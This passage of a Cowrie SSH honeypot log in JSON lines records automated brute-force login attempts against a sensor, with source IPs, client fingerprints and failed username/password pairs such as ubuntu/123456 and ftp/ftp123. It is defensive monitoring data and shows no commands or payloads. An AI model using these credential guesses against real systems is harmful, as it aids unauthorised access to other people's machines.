{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54148,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4a37c0ed4d8","protocol":"ssh","message":"New connection: 212.227.125.160:54148 (1.2.3.4:22) [session: d4a37c0ed4d8]","sensor":"my-vps","timestamp":"2025-08-26T22:06:24.762561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:24.813590Z","src_ip":"212.227.125.160","session":"d4a37c0ed4d8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:24.814315Z","src_ip":"212.227.125.160","session":"d4a37c0ed4d8"}
{"eventid":"cowrie.login.failed","username":"jack","password":"jack","message":"login attempt [jack/jack] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:25.116686Z","src_ip":"212.227.125.160","session":"d4a37c0ed4d8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:26.178427Z","src_ip":"212.227.125.160","session":"d4a37c0ed4d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49532,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f55a1cd2faf","protocol":"ssh","message":"New connection: 212.227.125.160:49532 (1.2.3.4:22) [session: 0f55a1cd2faf]","sensor":"my-vps","timestamp":"2025-08-26T22:06:30.008589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:30.009605Z","src_ip":"212.227.125.160","session":"0f55a1cd2faf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:30.065175Z","src_ip":"212.227.125.160","session":"0f55a1cd2faf"}
{"eventid":"cowrie.login.failed","username":"games","password":"games","message":"login attempt [games/games] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:30.204948Z","src_ip":"212.227.125.160","session":"0f55a1cd2faf"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:31.289280Z","src_ip":"212.227.125.160","session":"0f55a1cd2faf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44922,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd07b52f20bb","protocol":"ssh","message":"New connection: 212.227.125.160:44922 (1.2.3.4:22) [session: dd07b52f20bb]","sensor":"my-vps","timestamp":"2025-08-26T22:06:35.502721Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:35.504961Z","src_ip":"212.227.125.160","session":"dd07b52f20bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:35.553661Z","src_ip":"212.227.125.160","session":"dd07b52f20bb"}
{"eventid":"cowrie.login.failed","username":"vncuser","password":"vncuser","message":"login attempt [vncuser/vncuser] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:35.764843Z","src_ip":"212.227.125.160","session":"dd07b52f20bb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:36.826761Z","src_ip":"212.227.125.160","session":"dd07b52f20bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40306,"dst_ip":"1.2.3.4","dst_port":22,"session":"e800c9120cc5","protocol":"ssh","message":"New connection: 212.227.125.160:40306 (1.2.3.4:22) [session: e800c9120cc5]","sensor":"my-vps","timestamp":"2025-08-26T22:06:41.097829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:41.127463Z","src_ip":"212.227.125.160","session":"e800c9120cc5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:41.163441Z","src_ip":"212.227.125.160","session":"e800c9120cc5"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:41.349880Z","src_ip":"212.227.125.160","session":"e800c9120cc5"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:42.430264Z","src_ip":"212.227.125.160","session":"e800c9120cc5"}
{"eventid":"cowrie.session.closed","duration":30.44083070755005,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:43.483974Z","src_ip":"212.227.125.160","session":"8f6549d3bd4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35692,"dst_ip":"1.2.3.4","dst_port":22,"session":"d05e57b32210","protocol":"ssh","message":"New connection: 212.227.125.160:35692 (1.2.3.4:22) [session: d05e57b32210]","sensor":"my-vps","timestamp":"2025-08-26T22:06:46.280689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:46.293062Z","src_ip":"212.227.125.160","session":"d05e57b32210"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:46.385207Z","src_ip":"212.227.125.160","session":"d05e57b32210"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:46.564695Z","src_ip":"212.227.125.160","session":"d05e57b32210"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:47.673517Z","src_ip":"212.227.125.160","session":"d05e57b32210"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59310,"dst_ip":"1.2.3.4","dst_port":22,"session":"3324bc4dc4d2","protocol":"ssh","message":"New connection: 212.227.125.160:59310 (1.2.3.4:22) [session: 3324bc4dc4d2]","sensor":"my-vps","timestamp":"2025-08-26T22:06:52.513079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:52.513867Z","src_ip":"212.227.125.160","session":"3324bc4dc4d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:52.559360Z","src_ip":"212.227.125.160","session":"3324bc4dc4d2"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:52.695448Z","src_ip":"212.227.125.160","session":"3324bc4dc4d2"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:53.819311Z","src_ip":"212.227.125.160","session":"3324bc4dc4d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54698,"dst_ip":"1.2.3.4","dst_port":22,"session":"75c64c9f7452","protocol":"ssh","message":"New connection: 212.227.125.160:54698 (1.2.3.4:22) [session: 75c64c9f7452]","sensor":"my-vps","timestamp":"2025-08-26T22:06:58.339689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:06:58.398181Z","src_ip":"212.227.125.160","session":"75c64c9f7452"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:06:58.398973Z","src_ip":"212.227.125.160","session":"75c64c9f7452"}
{"eventid":"cowrie.login.failed","username":"hestiaweb","password":"hestiaweb","message":"login attempt [hestiaweb/hestiaweb] failed","sensor":"my-vps","timestamp":"2025-08-26T22:06:58.698004Z","src_ip":"212.227.125.160","session":"75c64c9f7452"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:06:59.753744Z","src_ip":"212.227.125.160","session":"75c64c9f7452"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50084,"dst_ip":"1.2.3.4","dst_port":22,"session":"01519e853dde","protocol":"ssh","message":"New connection: 212.227.125.160:50084 (1.2.3.4:22) [session: 01519e853dde]","sensor":"my-vps","timestamp":"2025-08-26T22:07:03.779361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:03.780369Z","src_ip":"212.227.125.160","session":"01519e853dde"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:03.829172Z","src_ip":"212.227.125.160","session":"01519e853dde"}
{"eventid":"cowrie.login.failed","username":"esearch","password":"esearch","message":"login attempt [esearch/esearch] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:04.014253Z","src_ip":"212.227.125.160","session":"01519e853dde"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:05.061679Z","src_ip":"212.227.125.160","session":"01519e853dde"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45470,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e872f789074","protocol":"ssh","message":"New connection: 212.227.125.160:45470 (1.2.3.4:22) [session: 2e872f789074]","sensor":"my-vps","timestamp":"2025-08-26T22:07:09.453371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:09.458036Z","src_ip":"212.227.125.160","session":"2e872f789074"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:07:09.503133Z","src_ip":"212.227.125.160","session":"2e872f789074"}
{"eventid":"cowrie.login.failed","username":"fastmail","password":"fastmail","message":"login attempt [fastmail/fastmail] failed","sensor":"my-vps","timestamp":"2025-08-26T22:07:09.716706Z","src_ip":"212.227.125.160","session":"2e872f789074"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:10.898055Z","src_ip":"212.227.125.160","session":"2e872f789074"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49608,"dst_ip":"1.2.3.4","dst_port":22,"session":"db67f8507516","protocol":"ssh","message":"New connection: 217.72.205.35:49608 (1.2.3.4:22) [session: db67f8507516]","sensor":"my-vps","timestamp":"2025-08-26T22:07:11.745422Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:07:11.747266Z","src_ip":"217.72.205.35","session":"db67f8507516"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":46392,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fc301eedb36","protocol":"ssh","message":"New connection: 139.19.117.131:46392 (1.2.3.4:22) [session: 6fc301eedb36]","sensor":"my-vps","timestamp":"2025-08-26T22:07:12.564139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:07:12.565139Z","src_ip":"139.19.117.131","session":"6fc301eedb36"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecds